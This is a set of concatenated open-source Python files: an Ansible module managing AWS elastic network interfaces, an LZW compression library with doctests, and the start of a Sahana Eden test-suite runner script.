- List of security groups associated with the interface. Only used when state=present.
required: false
default: null
state:
description:
- Create or delete ENI.
required: false
default: present
choices: [ 'present', 'absent' ]
device_index:
description:
- The index of the device for the network interface attachment on the instance.
required: false
default: 0
force_detach:
description:
- Force detachment of the interface. This applies either when explicitly detaching the interface by setting instance_id to None or when deleting an interface with state=absent.
required: false
default: no
delete_on_termination:
description:
- Delete the interface when the instance it is attached to is terminated. You can only specify this flag when the interface is being modified, not on creation.
required: false
source_dest_check:
description:
- By default, interfaces perform source/destination checks. NAT instances however need this check to be disabled. You can only specify this flag when the interface is being modified, not on creation.
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Create an ENI. As no security group is defined, ENI will be created in default security group
- ec2_eni:
private_ip_address: 172.31.0.20
subnet_id: subnet-xxxxxxxx
state: present
# Create an ENI and attach it to an instance
- ec2_eni:
instance_id: i-xxxxxxx
device_index: 1
private_ip_address: 172.31.0.20
subnet_id: subnet-xxxxxxxx
state: present
# Destroy an ENI, detaching it from any instance if necessary
- ec2_eni:
eni_id: eni-xxxxxxx
force_detach: yes
state: absent
# Update an ENI
- ec2_eni:
eni_id: eni-xxxxxxx
description: "My new description"
state: present
# Detach an ENI from an instance
- ec2_eni:
eni_id: eni-xxxxxxx
instance_id: None
state: present
### Delete an interface on termination
# First create the interface
- ec2_eni:
instance_id: i-xxxxxxx
device_index: 1
private_ip_address: 172.31.0.20
subnet_id: subnet-xxxxxxxx
state: present
register: eni
# Modify the interface to enable the delete_on_terminaton flag
- ec2_eni:
eni_id: {{ "eni.interface.id" }}
delete_on_termination: true
'''
import time
import xml.etree.ElementTree as ET
import re
try:
import boto.ec2
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_error_message(xml_string):
root = ET.fromstring(xml_string)
for message in root.findall('.//Message'):
return message.text
def get_eni_info(interface):
interface_info = {'id': interface.id,
'subnet_id': interface.subnet_id,
'vpc_id': interface.vpc_id,
'description': interface.description,
'owner_id': interface.owner_id,
'status': interface.status,
'mac_address': interface.mac_address,
'private_ip_address': interface.private_ip_address,
'source_dest_check': interface.source_dest_check,
'groups': dict((group.id, group.name) for group in interface.groups),
}
if interface.attachment is not None:
interface_info['attachment'] = {'attachment_id': interface.attachment.id,
'instance_id': interface.attachment.instance_id,
'device_index': interface.attachment.device_index,
'status': interface.attachment.status,
'attach_time': interface.attachment.attach_time,
'delete_on_termination': interface.attachment.delete_on_termination,
}
return interface_info
def wait_for_eni(eni, status):
while True:
time.sleep(3)
eni.update()
# If the status is detached we just need attachment to disappear
if eni.attachment is None:
if status == "detached":
break
else:
if status == "attached" and eni.attachment.status == "attached":
break
def create_eni(connection, module):
instance_id = module.params.get("instance_id")
if instance_id == 'None':
instance_id = None
do_detach = True
else:
do_detach = False
device_index = module.params.get("device_index")
subnet_id = module.params.get('subnet_id')
private_ip_address = module.params.get('private_ip_address')
description = module.params.get('description')
security_groups = module.params.get('security_groups')
changed = False
try:
eni = compare_eni(connection, module)
if eni is None:
eni = connection.create_network_interface(subnet_id, private_ip_address, description, security_groups)
if instance_id is not None:
try:
eni.attach(instance_id, device_index)
except BotoServerError as ex:
eni.delete()
raise
# Wait to allow creation / attachment to finish
wait_for_eni(eni, "attached")
eni.update()
changed = True
except BotoServerError as e:
module.fail_json(msg=get_error_message(e.args[2]))
module.exit_json(changed=changed, interface=get_eni_info(eni))
def modify_eni(connection, module):
eni_id = module.params.get("eni_id")
instance_id = module.params.get("instance_id")
if instance_id == 'None':
instance_id = None
do_detach = True
else:
do_detach = False
device_index = module.params.get("device_index")
subnet_id = module.params.get('subnet_id')
private_ip_address = module.params.get('private_ip_address')
description = module.params.get('description')
security_groups = module.params.get('security_groups')
force_detach = module.params.get("force_detach")
source_dest_check = module.params.get("source_dest_check")
delete_on_termination = module.params.get("delete_on_termination")
changed = False
try:
# Get the eni with the eni_id specified
eni_result_set = connection.get_all_network_interfaces(eni_id)
eni = eni_result_set[0]
if description is not None:
if eni.description != description:
connection.modify_network_interface_attribute(eni.id, "description", description)
changed = True
if security_groups is not None:
if sorted(get_sec_group_list(eni.groups)) != sorted(security_groups):
connection.modify_network_interface_attribute(eni.id, "groupSet", security_groups)
changed = True
if source_dest_check is not None:
if eni.source_dest_check != source_dest_check:
connection.modify_network_interface_attribute(eni.id, "sourceDestCheck", source_dest_check)
changed = True
if delete_on_termination is not None:
if eni.attachment is not None:
if eni.attachment.delete_on_termination is not delete_on_termination:
connection.modify_network_interface_attribute(eni.id, "deleteOnTermination", delete_on_termination, eni.attachment.id)
changed = True
else:
module.fail_json(msg="Can not modify delete_on_termination as the interface is not attached")
if eni.attachment is not None and instance_id is None and do_detach is True:
eni.detach(force_detach)
wait_for_eni(eni, "detached")
changed = True
else:
if instance_id is not None:
eni.attach(instance_id, device_index)
wait_for_eni(eni, "attached")
changed = True
except BotoServerError as e:
print e
module.fail_json(msg=get_error_message(e.args[2]))
eni.update()
module.exit_json(changed=changed, interface=get_eni_info(eni))
def delete_eni(connection, module):
eni_id = module.params.get("eni_id")
force_detach = module.params.get("force_detach")
try:
eni_result_set = connection.get_all_network_interfaces(eni_id)
eni = eni_result_set[0]
if force_detach is True:
if eni.attachment is not None:
eni.detach(force_detach)
# Wait to allow detachment to finish
wait_for_eni(eni, "detached")
eni.update()
eni.delete()
changed = True
else:
eni.delete()
changed = True
module.exit_json(changed=changed)
except BotoServerError as e:
msg = get_error_message(e.args[2])
regex = re.compile('The networkInterface ID \'.*\' does not exist')
if regex.search(msg) is not None:
module.exit_json(changed=False)
else:
module.fail_json(msg=get_error_message(e.args[2]))
def compare_eni(connection, module):
eni_id = module.params.get("eni_id")
subnet_id = module.params.get('subnet_id')
private_ip_address = module.params.get('private_ip_address')
description = module.params.get('description')
security_groups = module.params.get('security_groups')
try:
all_eni = connection.get_all_network_interfaces(eni_id)
for eni in all_eni:
remote_security_groups = get_sec_group_list(eni.groups)
if (eni.subnet_id == subnet_id) and (eni.private_ip_address == private_ip_address) and (eni.description == description) and (remote_security_groups == security_groups):
return eni
except BotoServerError as e:
module.fail_json(msg=get_error_message(e.args[2]))
return None
def get_sec_group_list(groups):
# Build list of remote security groups
remote_security_groups = []
for group in groups:
remote_security_groups.append(group.id.encode())
return remote_security_groups
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
eni_id = dict(default=None),
instance_id = dict(default=None),
private_ip_address = dict(),
subnet_id = dict(),
description = dict(),
security_groups = dict(type='list'),
device_index = dict(default=0, type='int'),
state = dict(default='present', choices=['present', 'absent']),
force_detach = dict(default='no', type='bool'),
source_dest_check = dict(default=None, type='bool'),
delete_on_termination = dict(default=None, type='bool')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.ec2, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, StandardError), e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
state = module.params.get("state")
eni_id = module.params.get("eni_id")
if state == 'present':
if eni_id is None:
if module.params.get("subnet_id") is None:
module.fail_json(msg="subnet_id must be specified when state=present")
create_eni(connection, module)
else:
modify_eni(connection, module)
elif state == 'absent':
if eni_id is None:
module.fail_json(msg="eni_id must be specified")
else:
delete_eni(connection, module)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
| gpl-3.0 |
hickerson/bbn | fable/fable_sources/libtbx/lzw.py | 1 | 25535 | """
A stream friendly, simple compression library, built around
iterators. See L{compress} and L{decompress} for the easiest way to
get started.
After the TIFF implementation of LZW, as described at
U{http://www.fileformat.info/format/tiff/corion-lzw.htm}
In an even-nuttier-shell, lzw compresses input bytes with integer
codes. Starting with codes 0-255 that code to themselves, and two
control codes, we work our way through a stream of bytes. When we
encounter a pair of codes c1,c2 we add another entry to our code table
with the lowest available code and the value value(c1) + value(c2)[0]
Of course, there are details :)
The Details
===========
Our control codes are
- CLEAR_CODE (codepoint 256). When this code is encountered, we flush
the codebook and start over.
- END_OF_INFO_CODE (codepoint 257). This code is reserved for
encoder/decoders over the integer codepoint stream (like the
mechanical bit that unpacks bits into codepoints)
When dealing with bytes, codes are emitted as variable
length bit strings packed into the stream of bytes.
codepoints are written with varying length
- initially 9 bits
- at 512 entries 10 bits
- at 1025 entries at 11 bits
- at 2048 entries 12 bits
- with max of 4095 entries in a table (including Clear and EOI)
code points are stored with their MSB in the most significant bit
available in the output character.
>>> import lzw
>>>
>>> mybytes = lzw.readbytes("README.txt")
>>> lessbytes = lzw.compress(mybytes)
>>> newbytes = b"".join(lzw.decompress(lessbytes))
>>> oldbytes = b"".join(lzw.readbytes("README.txt"))
>>> oldbytes == newbytes
True
"""
from __future__ import division
__author__ = "Joe Bowers"
__license__ = "MIT License"
__version__ = "0.01.01"
__status__ = "Development"
__email__ = "[email protected]"
__url__ = "http://www.joe-bowers.com/static/lzw"
import struct
import itertools
CLEAR_CODE = 256
END_OF_INFO_CODE = 257
DEFAULT_MIN_BITS = 9
DEFAULT_MAX_BITS = 12
def compress(plaintext_bytes):
"""
Given an iterable of bytes, returns a (hopefully shorter) iterable
of bytes that you can store in a file or pass over the network or
what-have-you, and later use to get back your original bytes with
L{decompress}. This is the best place to start using this module.
"""
encoder = ByteEncoder()
return encoder.encodetobytes(plaintext_bytes)
def decompress(compressed_bytes):
"""
Given an iterable of bytes that were the result of a call to
L{compress}, returns an iterator over the uncompressed bytes.
"""
decoder = ByteDecoder()
return decoder.decodefrombytes(compressed_bytes)
class ByteEncoder(object):
"""
Takes a stream of uncompressed bytes and produces a stream of
compressed bytes, usable by L{ByteDecoder}. Combines an L{Encoder}
with a L{BitPacker}.
>>> import lzw
>>>
>>> enc = lzw.ByteEncoder(12)
>>> bigstr = b"gabba gabba yo gabba gabba gabba yo gabba gabba gabba yo gabba gabba gabba yo"
>>> encoding = enc.encodetobytes(bigstr)
>>> encoded = b"".join( b for b in encoding )
>>> encoded
'3\\x98LF#\\x08\\x82\\x05\\x04\\x83\\x1eM\\xf0x\\x1c\\x16\\x1b\\t\\x88C\\xe1q(4"\\x1f\\x17\\x85C#1X\\xec.\\x00'
>>>
>>> dec = lzw.ByteDecoder()
>>> decoding = dec.decodefrombytes(encoded)
>>> decoded = b"".join(decoding)
>>> decoded == bigstr
True
"""
def __init__(self, max_width=DEFAULT_MAX_BITS):
"""
max_width is the maximum width in bits we want to see in the
output stream of codepoints.
"""
self._encoder = Encoder(max_code_size=2**max_width)
self._packer = BitPacker(initial_code_size=self._encoder.code_size())
def encodetobytes(self, bytesource):
"""
Returns an iterator of bytes, adjusting our packed width
between minwidth and maxwidth when it detects an overflow is
about to occur. Dual of L{ByteDecoder.decodefrombytes}.
"""
codepoints = self._encoder.encode(bytesource)
codebytes = self._packer.pack(codepoints)
return codebytes
class ByteDecoder(object):
"""
Decodes, combines bit-unpacking and interpreting a codepoint
stream, suitable for use with bytes generated by
L{ByteEncoder}.
See L{ByteDecoder} for a usage example.
"""
def __init__(self):
"""
"""
self._decoder = Decoder()
self._unpacker = BitUnpacker(initial_code_size=self._decoder.code_size())
self.remaining = []
def decodefrombytes(self, bytesource):
"""
Given an iterator over BitPacked, Encoded bytes, Returns an
iterator over the uncompressed bytes. Dual of
L{ByteEncoder.encodetobytes}. See L{ByteEncoder} for an
example of use.
"""
codepoints = self._unpacker.unpack(bytesource)
clearbytes = self._decoder.decode(codepoints)
return clearbytes
class BitPacker(object):
"""
Translates a stream of lzw codepoints into a variable width packed
stream of bytes, for use by L{BitUnpacker}. One of a (potential)
set of encoders for a stream of LZW codepoints, intended to behave
as closely to the TIFF variable-width encoding scheme as closely
as possible.
The inbound stream of integer lzw codepoints are packed into
variable width bit fields, starting at the smallest number of bits
it can and then increasing the bit width as it anticipates the LZW
code size growing to overflow.
This class knows all kinds of intimate things about how it's
upstream codepoint processors work; it knows the control codes
CLEAR_CODE and END_OF_INFO_CODE, and (more intimately still), it
makes assumptions about the rate of growth of it's consumer's
codebook. This is ok, as long as the underlying encoder/decoders
don't know any intimate details about their BitPackers/Unpackers
"""
def __init__(self, initial_code_size):
"""
Takes an initial code book size (that is, the count of known
codes at the beginning of encoding, or after a clear)
"""
self._initial_code_size = initial_code_size
def pack(self, codepoints):
"""
Given an iterator of integer codepoints, returns an iterator
over bytes containing the codepoints packed into varying
lengths, with bit width growing to accomodate an input code
that it assumes will grow by one entry per codepoint seen.
Widths will be reset to the given initial_code_size when the
LZW CLEAR_CODE or END_OF_INFO_CODE code appears in the input,
and bytes following END_OF_INFO_CODE will be aligned to the
next byte boundary.
>>> import lzw
>>> pkr = lzw.BitPacker(258)
>>> [ b for b in pkr.pack([ 1, 257]) ] == [ chr(0), chr(0xC0), chr(0x40) ]
True
"""
tailbits = []
codesize = self._initial_code_size
minwidth = 8
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
nextwidth = minwidth
for pt in codepoints:
newbits = inttobits(pt, nextwidth)
tailbits = tailbits + newbits
# PAY ATTENTION. This calculation should be driven by the
# size of the upstream codebook, right now we're just trusting
# that everybody intends to follow the TIFF spec.
codesize = codesize + 1
if pt == END_OF_INFO_CODE:
while len(tailbits) % 8:
tailbits.append(0)
if pt in [ CLEAR_CODE, END_OF_INFO_CODE ]:
nextwidth = minwidth
codesize = self._initial_code_size
elif codesize >= (2 ** nextwidth):
nextwidth = nextwidth + 1
while len(tailbits) > 8:
nextbits = tailbits[:8]
nextbytes = bitstobytes(nextbits)
for bt in nextbytes:
yield struct.pack("B", bt)
tailbits = tailbits[8:]
if tailbits:
tail = bitstobytes(tailbits)
for bt in tail:
yield struct.pack("B", bt)
class BitUnpacker(object):
"""
An adaptive-width bit unpacker, intended to decode streams written
by L{BitPacker} into integer codepoints. Like L{BitPacker}, knows
about code size changes and control codes.
"""
def __init__(self, initial_code_size):
"""
initial_code_size is the starting size of the codebook
associated with the to-be-unpacked stream.
"""
self._initial_code_size = initial_code_size
def unpack(self, bytesource):
"""
Given an iterator of bytes, returns an iterator of integer
code points. Auto-magically adjusts point width when it sees
an almost-overflow in the input stream, or an LZW CLEAR_CODE
or END_OF_INFO_CODE
Trailing bits at the end of the given iterator, after the last
codepoint, will be dropped on the floor.
At the end of the iteration, or when an END_OF_INFO_CODE seen
the unpacker will ignore the bits after the code until it
reaches the next aligned byte. END_OF_INFO_CODE will *not*
stop the generator, just reset the alignment and the width
>>> import lzw
>>> unpk = lzw.BitUnpacker(initial_code_size=258)
>>> [ i for i in unpk.unpack([ chr(0), chr(0xC0), chr(0x40) ]) ]
[1, 257]
"""
bits = []
offset = 0
ignore = 0
codesize = self._initial_code_size
minwidth = 8
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
pointwidth = minwidth
for nextbit in bytestobits(bytesource):
offset = (offset + 1) % 8
if ignore > 0:
ignore = ignore - 1
continue
bits.append(nextbit)
if len(bits) == pointwidth:
codepoint = intfrombits(bits)
bits = []
yield codepoint
codesize = codesize + 1
if codepoint in [ CLEAR_CODE, END_OF_INFO_CODE ]:
codesize = self._initial_code_size
pointwidth = minwidth
else:
# is this too late?
while codesize >= (2 ** pointwidth):
pointwidth = pointwidth + 1
if codepoint == END_OF_INFO_CODE:
ignore = (8 - offset) % 8
class Decoder(object):
"""
Uncompresses a stream of lzw code points, as created by
L{Encoder}. Given a list of integer code points, with all
unpacking foolishness complete, turns that list of codepoints into
a list of uncompressed bytes. See L{BitUnpacker} for what this
doesn't do.
"""
def __init__(self):
"""
Creates a new Decoder. Decoders should not be reused for
different streams.
"""
self._clear_codes()
self.remainder = []
def code_size(self):
"""
Returns the current size of the Decoder's code book, that is,
it's mapping of codepoints to byte strings. The return value of
this method will change as the decode encounters more encoded
input, or control codes.
"""
return len(self._codepoints)
def decode(self, codepoints):
"""
Given an iterable of integer codepoints, yields the
corresponding bytes, one at a time, as byte strings of length
E{1}. Retains the state of the codebook from call to call, so
if you have another stream, you'll likely need another
decoder!
Decoders will NOT handle END_OF_INFO_CODE (rather, they will
handle the code by throwing an exception); END_OF_INFO should
be handled by the upstream codepoint generator (see
L{BitUnpacker}, for example)
>>> import lzw
>>> dec = lzw.Decoder()
>>> ''.join(dec.decode([103, 97, 98, 98, 97, 32, 258, 260, 262, 121, 111, 263, 259, 261, 256]))
'gabba gabba yo gabba'
"""
codepoints = [ cp for cp in codepoints ]
for cp in codepoints:
decoded = self._decode_codepoint(cp)
for character in decoded:
yield character
def _decode_codepoint(self, codepoint):
"""
Will raise a ValueError if given an END_OF_INFORMATION
code. EOI codes should be handled by callers if they're
present in our source stream.
>>> import lzw
>>> dec = lzw.Decoder()
>>> beforesize = dec.code_size()
>>> dec._decode_codepoint(0x80)
'\\x80'
>>> dec._decode_codepoint(0x81)
'\\x81'
>>> beforesize + 1 == dec.code_size()
True
>>> dec._decode_codepoint(256)
''
>>> beforesize == dec.code_size()
True
"""
ret = ""
if codepoint == CLEAR_CODE:
self._clear_codes()
elif codepoint == END_OF_INFO_CODE:
raise ValueError("End of information code not supported directly by this Decoder")
else:
if codepoint in self._codepoints:
ret = self._codepoints[ codepoint ]
if None != self._prefix:
self._codepoints[ len(self._codepoints) ] = self._prefix + ret[0]
else:
ret = self._prefix + self._prefix[0]
self._codepoints[ len(self._codepoints) ] = ret
self._prefix = ret
return ret
def _clear_codes(self):
self._codepoints = dict([(pt, struct.pack("B", pt)) for pt in range(256)])
self._codepoints[CLEAR_CODE] = CLEAR_CODE
self._codepoints[END_OF_INFO_CODE] = END_OF_INFO_CODE
self._prefix = None
class Encoder(object):
"""
Given an iterator of bytes, returns an iterator of integer
codepoints, suitable for use by L{Decoder}. The core of the
"compression" side of lzw compression/decompression.
"""
def __init__(self, max_code_size=(2**DEFAULT_MAX_BITS)):
"""
When the encoding codebook grows larger than max_code_size,
the Encoder will clear its codebook and emit a CLEAR_CODE
"""
self.closed = False
self._max_code_size = max_code_size
self._buffer = ''
self._clear_codes()
if max_code_size < self.code_size():
raise ValueError("Max code size too small, (must be at least {0})".format(self.code_size()))
def code_size(self):
"""
Returns a count of the known codes, including codes that are
implicit in the data but have not yet been produced by the
iterator.
"""
return len(self._prefixes)
def flush(self):
"""
Yields any buffered codepoints, followed by a CLEAR_CODE, and
clears the codebook as a side effect.
"""
flushed = []
if self._buffer:
yield self._prefixes[ self._buffer ]
self._buffer = ''
yield CLEAR_CODE
self._clear_codes()
def encode(self, bytesource):
"""
Given an iterator over bytes, yields the
corresponding stream of codepoints.
Will clear the codes at the end of the stream.
>>> import lzw
>>> enc = lzw.Encoder()
>>> [ cp for cp in enc.encode("gabba gabba yo gabba") ]
[103, 97, 98, 98, 97, 32, 258, 260, 262, 121, 111, 263, 259, 261, 256]
"""
for b in bytesource:
for point in self._encode_byte(b):
yield point
if self.code_size() >= self._max_code_size:
for pt in self.flush():
yield pt
for point in self.flush():
yield point
def _encode_byte(self, byte):
# Yields one or zero bytes, AND changes the internal state of
# the codebook and prefix buffer.
#
# Unless you're in self.encode(), you almost certainly don't
# want to call this.
new_prefix = self._buffer
if new_prefix + byte in self._prefixes:
new_prefix = new_prefix + byte
elif new_prefix:
encoded = self._prefixes[ new_prefix ]
self._add_code(new_prefix + byte)
new_prefix = byte
yield encoded
self._buffer = new_prefix
def _clear_codes(self):
# Teensy hack, CLEAR_CODE and END_OF_INFO_CODE aren't
# equal to any possible string.
self._prefixes = dict([(struct.pack("B", codept), codept) for codept in range(256)])
self._prefixes[ CLEAR_CODE ] = CLEAR_CODE
self._prefixes[ END_OF_INFO_CODE ] = END_OF_INFO_CODE
def _add_code(self, newstring):
self._prefixes[ newstring ] = len(self._prefixes)
class PagingEncoder(object):
"""
UNTESTED. Handles encoding of multiple chunks or streams of encodable data,
separated with control codes. Dual of PagingDecoder.
"""
def __init__(self, initial_code_size, max_code_size):
self._initial_code_size = initial_code_size
self._max_code_size = max_code_size
def encodepages(self, pages):
"""
Given an iterator of iterators of bytes, produces a single
iterator containing a delimited sequence of independantly
compressed LZW sequences, all beginning on a byte-aligned
spot, all beginning with a CLEAR code and all terminated with
an END_OF_INFORMATION code (and zero to seven trailing junk
bits.)
The dual of PagingDecoder.decodepages
>>> import lzw
>>> enc = lzw.PagingEncoder(257, 2**12)
>>> coded = enc.encodepages([ "say hammer yo hammer mc hammer go hammer",
... "and the rest can go and play",
... "can't touch this" ])
...
>>> b"".join(coded)
'\\x80\\x1c\\xcc\\'\\x91\\x01\\xa0\\xc2m6\\x99NB\\x03\\xc9\\xbe\\x0b\\x07\\x84\\xc2\\xcd\\xa68|"\\x14 3\\xc3\\xa0\\xd1c\\x94\\x02\\x02\\x80\\x18M\\xc6A\\x01\\xd0\\xd0e\\x10\\x1c\\x8c\\xa73\\xa0\\x80\\xc7\\x02\\x10\\x19\\xcd\\xe2\\x08\\x14\\x10\\xe0l0\\x9e`\\x10\\x10\\x80\\x18\\xcc&\\xe19\\xd0@t7\\x9dLf\\x889\\xa0\\xd2s\\x80@@'
"""
for page in pages:
encoder = Encoder(max_code_size=self._max_code_size)
codepoints = encoder.encode(page)
codes_and_eoi = itertools.chain([ CLEAR_CODE ], codepoints, [ END_OF_INFO_CODE ])
packer = BitPacker(initial_code_size=encoder.code_size())
packed = packer.pack(codes_and_eoi)
for byte in packed:
yield byte
class PagingDecoder(object):
"""
UNTESTED. Dual of PagingEncoder, knows how to handle independantly encoded,
END_OF_INFO_CODE delimited chunks of an inbound byte stream
"""
def __init__(self, initial_code_size):
self._initial_code_size = initial_code_size
self._remains = []
def next_page(self, codepoints):
"""
Iterator over the next page of codepoints.
"""
self._remains = []
try:
while 1:
cp = codepoints.next()
if cp != END_OF_INFO_CODE:
yield cp
else:
self._remains = codepoints
break
except StopIteration:
pass
def decodepages(self, bytesource):
"""
Takes an iterator of bytes, returns an iterator of iterators
of uncompressed data. Expects input to conform to the output
conventions of PagingEncoder(), in particular that "pages" are
separated with an END_OF_INFO_CODE and padding up to the next
byte boundary.
BUG: Dangling trailing page on decompression.
>>> import lzw
>>> pgdec = lzw.PagingDecoder(initial_code_size=257)
>>> pgdecoded = pgdec.decodepages(
... ''.join([ '\\x80\\x1c\\xcc\\'\\x91\\x01\\xa0\\xc2m6',
... '\\x99NB\\x03\\xc9\\xbe\\x0b\\x07\\x84\\xc2',
... '\\xcd\\xa68|"\\x14 3\\xc3\\xa0\\xd1c\\x94',
... '\\x02\\x02\\x80\\x18M\\xc6A\\x01\\xd0\\xd0e',
... '\\x10\\x1c\\x8c\\xa73\\xa0\\x80\\xc7\\x02\\x10',
... '\\x19\\xcd\\xe2\\x08\\x14\\x10\\xe0l0\\x9e`\\x10',
... '\\x10\\x80\\x18\\xcc&\\xe19\\xd0@t7\\x9dLf\\x889',
... '\\xa0\\xd2s\\x80@@' ])
... )
>>> [ b"".join(pg) for pg in pgdecoded ]
['say hammer yo hammer mc hammer go hammer', 'and the rest can go and play', "can't touch this", '']
"""
# TODO: WE NEED A CODE SIZE POLICY OBJECT THAT ISN'T THIS.
# honestly, we should have a "codebook" object we need to pass
# to bit packing/unpacking tools, etc, such that we don't have
# to roll all of these code size assumptions everyplace.
unpacker = BitUnpacker(initial_code_size=self._initial_code_size)
codepoints = unpacker.unpack(bytesource)
self._remains = codepoints
while self._remains:
nextpoints = self.next_page(self._remains)
nextpoints = [ nx for nx in nextpoints ]
decoder = Decoder()
decoded = decoder.decode(nextpoints)
decoded = [ dec for dec in decoded ]
yield decoded
#########################################
# Conveniences.
# PYTHON V2
def unpackbyte(b):
"""
Given a one-byte long byte string, returns an integer. Equivalent
to struct.unpack("B", b)
"""
(ret,) = struct.unpack("B", b)
return ret
# PYTHON V3
# def unpackbyte(b): return b
def filebytes(fileobj, buffersize=1024):
"""
Convenience for iterating over the bytes in a file. Given a
file-like object (with a read(int) method), returns an iterator
over the bytes of that file.
"""
buff = fileobj.read(buffersize)
while buff:
for byte in buff: yield byte
buff = fileobj.read(buffersize)
def readbytes(filename, buffersize=1024):
"""
Opens a file named by filename and iterates over the L{filebytes}
found therein. Will close the file when the bytes run out.
"""
for byte in filebytes(open(filename, "rb"), buffersize):
yield byte
def writebytes(filename, bytesource):
"""
Convenience for emitting the bytes we generate to a file. Given a
filename, opens and truncates the file, dumps the bytes
from bytesource into it, and closes it
"""
outfile = open(filename, "wb")
for bt in bytesource:
outfile.write(bt)
def inttobits(anint, width=None):
"""
Produces an array of booleans representing the given argument as
an unsigned integer, MSB first. If width is given, will pad the
MSBs to the given width (but will NOT truncate overflowing
results)
>>> import lzw
>>> lzw.inttobits(304, width=16)
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0]
"""
remains = anint
retreverse = []
while remains:
retreverse.append(remains & 1)
remains = remains >> 1
retreverse.reverse()
ret = retreverse
if None != width:
ret_head = [ 0 ] * (width - len(ret))
ret = ret_head + ret
return ret
def intfrombits(bits):
"""
Given a list of boolean values, interprets them as a binary
encoded, MSB-first unsigned integer (with True == 1 and False
== 0) and returns the result.
>>> import lzw
>>> lzw.intfrombits([ 1, 0, 0, 1, 1, 0, 0, 0, 0 ])
304
"""
ret = 0
lsb_first = [ b for b in bits ]
lsb_first.reverse()
for bit_index in range(len(lsb_first)):
if lsb_first[ bit_index ]:
ret = ret | (1 << bit_index)
return ret
def bytestobits(bytesource):
"""
Breaks a given iterable of bytes into an iterable of boolean
values representing those bytes as unsigned integers.
>>> import lzw
>>> [ x for x in lzw.bytestobits(b"\\x01\\x30") ]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0]
"""
for b in bytesource:
value = unpackbyte(b)
for bitplusone in range(8, 0, -1):
bitindex = bitplusone - 1
nextbit = 1 & (value >> bitindex)
yield nextbit
def bitstobytes(bits):
"""
Interprets an indexable list of booleans as bits, MSB first, to be
packed into a list of integers from 0 to 256, MSB first, with LSBs
zero-padded. Note this padding behavior means that round-trips of
bytestobits(bitstobytes(x, width=W)) may not yield what you expect
them to if W % 8 != 0
Does *NOT* pack the returned values into a bytearray or the like.
>>> import lzw
>>> bitstobytes([0, 0, 0, 0, 0, 0, 0, 0, "Yes, I'm True"]) == [ 0x00, 0x80 ]
True
>>> bitstobytes([0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0]) == [ 0x01, 0x30 ]
True
"""
ret = []
nextbyte = 0
nextbit = 7
for bit in bits:
if bit:
nextbyte = nextbyte | (1 << nextbit)
if nextbit:
nextbit = nextbit - 1
else:
ret.append(nextbyte)
nextbit = 7
nextbyte = 0
if nextbit < 7: ret.append(nextbyte)
return ret
| mit |
smeissner/eden | modules/tests/suite.py | 4 | 10356 | # This script is designed to be run as a Web2Py application:
# python web2py.py -S eden -M -R applications/eden/modules/tests/suite.py
# or
# python web2py.py -S eden -M -R applications/eden/modules/tests/suite.py -A testscript
import sys
import re
import time
import unittest
import argparse
def loadAllTests():
# Create Organisation
loadTests = unittest.TestLoader().loadTestsFromTestCase
suite = loadTests(CreateOrganisation)
# Shortcut
addTests = suite.addTests
# Create Office
addTests(loadTests(CreateOffice))
# Setup Staff
addTests(loadTests(CreateStaff))
addTests(loadTests(CreateStaffJobRole))
addTests(loadTests(CreateStaffCertificate))
# Setup Volunteer
addTests(loadTests(CreateVolunteer))
addTests(loadTests(CreateVolunteerJobRole))
addTests(loadTests(CreateVolunteerProgramme))
addTests(loadTests(CreateVolunteerSkill))
addTests(loadTests(CreateVolunteerCertificate))
# Create Staff & Volunteer Training
addTests(loadTests(CreateStaffTraining))
addTests(loadTests(CreateVolunteerTraining))
# Inventory tests
addTests(loadTests(SendItem))
addTests(loadTests(ReceiveItem))
addTests(loadTests(SendReceiveItem))
# Project Tests
addTests(loadTests(CreateProject))
# Asset Tests
addTests(loadTests(CreateAsset))
# Assign Staff to Organisation
addTests(loadTests(AddStaffToOrganisation))
# Assign Staff to Office
addTests(loadTests(AddStaffToOffice))
# Assign Staff to Warehouse
addTests(loadTests(AddStaffToWarehouse))
# Delete a prepop organisation
#addTests(loadTests(DeleteOrganisation))
# Create a Warehouse
addTests(loadTests(CreateWarehouse))
# Create an Item
addTests(loadTests(CreateItem))
# Create a Catalog
addTests(loadTests(CreateCatalog))
# Create a Category
addTests(loadTests(CreateCategory))
# Create Members
addTests(loadTests(CreateMember))
# Search Staff (Simple & Advance)
#addTests(loadTests(SearchStaff))
return suite
# Set up the command line arguments
desc = "Script to run the Sahana Eden test suite."
parser = argparse.ArgumentParser(description = desc)
parser.add_argument("-C", "--class",
help = "Name of class to run"
)
method_desc = """Name of method to run, this is used in conjunction with the
class argument or with the name of the class followed by the name of the method
separated with a period, class.method.
"""
parser.add_argument("-M",
"--method",
"--test",
help = method_desc
)
parser.add_argument("-A",
"--auth",
help = """web2py default argument feed""",
)
parser.add_argument("-V", "--verbose",
type = int,
default = 1,
help = "The level of verbose reporting")
parser.add_argument("--nohtml",
action='store_const',
const=True,
help = "Disable HTML reporting."
)
parser.add_argument("--html-path",
help = "Path where the HTML report will be saved.",
default = ""
)
parser.add_argument("--html-name-date",
action='store_const',
const=True,
help = "Include just the date in the name of the HTML report."
)
suite_desc = """This will execute a standard testing schedule. The valid values
are, smoke, quick, complete and full. If a method or class options is selected
the the suite will be ignored.
The suite options can be described as follows:
smoke: This will run the broken link test
quick: This will run all the tests marked as essential
complete: This will run all tests except those marked as long
full: This will run all test
"""
parser.add_argument("--suite",
help = suite_desc,
choices = ["smoke", "roles", "quick", "complete", "full"],
default = "quick")
parser.add_argument("--link-depth",
type = int,
